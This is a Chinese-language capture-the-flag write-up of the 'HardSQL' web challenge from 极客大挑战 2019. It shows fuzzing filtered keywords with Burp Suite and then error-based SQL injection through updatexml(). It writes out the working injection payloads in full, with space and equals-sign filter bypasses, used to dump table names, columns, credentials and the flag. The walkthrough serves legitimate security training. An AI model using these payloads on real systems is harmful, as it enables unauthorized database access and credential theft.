[极客大挑战 2019]HardSQL
web第24题
[极客大挑战 2019]HardSQL
打开靶场
![[极客大挑战 2019]HardSQL_第1张图片](http://img.e-com-net.com/image/info8/6a4ab1846a084ad3bbbf03cb26ec7936.jpg)
首先尝试使用单引号
![[极客大挑战 2019]HardSQL_第2张图片](http://img.e-com-net.com/image/info8/f488f25cbacc4fb5b0421ee725ea25f3.jpg)
![[极客大挑战 2019]HardSQL_第3张图片](http://img.e-com-net.com/image/info8/8ad21ce9f0704eb5a12c9ca379f88f91.jpg)
显然页面存在sql注入的
永真式进行登陆
![[极客大挑战 2019]HardSQL_第4张图片](http://img.e-com-net.com/image/info8/d07e0898efba452cb6b9a718550020ee.jpg)
![[极客大挑战 2019]HardSQL_第5张图片](http://img.e-com-net.com/image/info8/fa048faa963f4d97b0a1136f40fbd088.jpg)
继续尝试order by爆字段
![[极客大挑战 2019]HardSQL_第6张图片](http://img.e-com-net.com/image/info8/ad69f391d6234e8ab1d3a7172b8974a8.jpg)
![[极客大挑战 2019]HardSQL_第7张图片](http://img.e-com-net.com/image/info8/ee2c70f9c46146b5a63991677f0c176c.jpg)
那么说明很多字符都被过滤了
尝试双写进行绕过
![[极客大挑战 2019]HardSQL_第8张图片](http://img.e-com-net.com/image/info8/afe328f5140b4e8984f3ac1509235d7c.jpg)
![[极客大挑战 2019]HardSQL_第9张图片](http://img.e-com-net.com/image/info8/e5a9b488be884667bd42ce6164abb06b.jpg)
依旧是不行
看了很多人的wp,他们都没说清楚如何知道对哪些关键字进行了过滤,直接给出了,我也不知道怎么来的
直接使用burpsuite对其进行fuzz,观察过滤了哪些关键字
参考:利用burpsuit对xss和sql注入进行fuzz
抓包发送至intruder模块
![[极客大挑战 2019]HardSQL_第10张图片](http://img.e-com-net.com/image/info8/9f8fda7929c945fd8804e0404206eef1.jpg)
设置payload,网上找的一个字典
![[极客大挑战 2019]HardSQL_第11张图片](http://img.e-com-net.com/image/info8/81289ea971e64363baeb6f7c9f66f5f6.jpg)
攻击
![[极客大挑战 2019]HardSQL_第12张图片](http://img.e-com-net.com/image/info8/b31d5156ba614f598c035b79302b37ce.jpg)
响应为密码错误,说明没有被过滤
![[极客大挑战 2019]HardSQL_第13张图片](http://img.e-com-net.com/image/info8/d43809dc5fe34d708e3206a265fa1096.jpg)
相应为此页面,说明被过滤了
得到响应为751的没有被过滤,响应为736的都被过滤了,统计出一些常用的被过滤的符号:空格 ,注释符,and,by,=,sleep,/,~等
那么这个时候的思路就应该是报错注入了
报错注入可以使用很多函数,常用的有floor()函数,extractvalue()函数,updatexml()函数等
这里使用一下我不熟悉的updatexml()函数,参考:updatexml()报错注入
使用()代替空格,使用like代替=,使用^连接函数形成异或
构造注入语句(我是在用户中输入的)
1.查询数据库:
admin'or(updatexml(1,concat(0x7e,database()),1))#
![[极客大挑战 2019]HardSQL_第14张图片](http://img.e-com-net.com/image/info8/18afafc68f2b4d02934aeb886d406393.jpg)
得到数据库名为geek
2.查询表名
admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),1))#
![[极客大挑战 2019]HardSQL_第15张图片](http://img.e-com-net.com/image/info8/a6e0703c25444d61aa1b5a777f3e650b.jpg)
得到表名H4rDsq1
3.查字段名
admin'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),1))#
![[极客大挑战 2019]HardSQL_第16张图片](http://img.e-com-net.com/image/info8/52f9d12599e6490e890b9e5dcb1f72b5.jpg)
得到字段名为id,username,password
4.爆数据
admin'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1))),1))#
![[极客大挑战 2019]HardSQL_第17张图片](http://img.e-com-net.com/image/info8/ef08475abb844608b8b6069d4bd91791.jpg)
知道数据库中第一条数据就是flag
额,好像flag没显示完
原因是报错内容最大字符数为32,后面的就不会再显示
这样,我们可以使用left和right函数先查左边,再查右边,然后拼接在一起就能得到flag
admin'or(updatexml(1,concat(0x7e,(select(left(password,30))from(H4rDsq1)where(username)like('flag'))),1))#
![[极客大挑战 2019]HardSQL_第18张图片](http://img.e-com-net.com/image/info8/ac63e93e38784edd840f912fddeb1a9a.jpg)
flag{b1642242-538e-42e5-9f94-6
admin'or(updatexml(1,concat(0x7e,(select(right(password,30))from(H4rDsq1)where(username)like('flag'))),1))#
![[极客大挑战 2019]HardSQL_第19张图片](http://img.e-com-net.com/image/info8/4c286e0d949545f4981d162be3c7e74e.jpg)
2-538e-42e5-9f94-6f52d4694821}
拼接得到flag
flag{b1642242-538e-42e5-9f94-6f52d4694821}
做到这里突然反应过来出了一点小问题,我是在登陆框中使用admin用户然后拼接or语句,这里是因为刚好数据库中不存在admin用户所以我or后面的语句会执行,但是如果存在admin用户后面的语句可能不会执行,正确的做法应该是使用^连接报错函数,形成异或,这样前后两个运算符都会执行,可以看看其他师傅的wp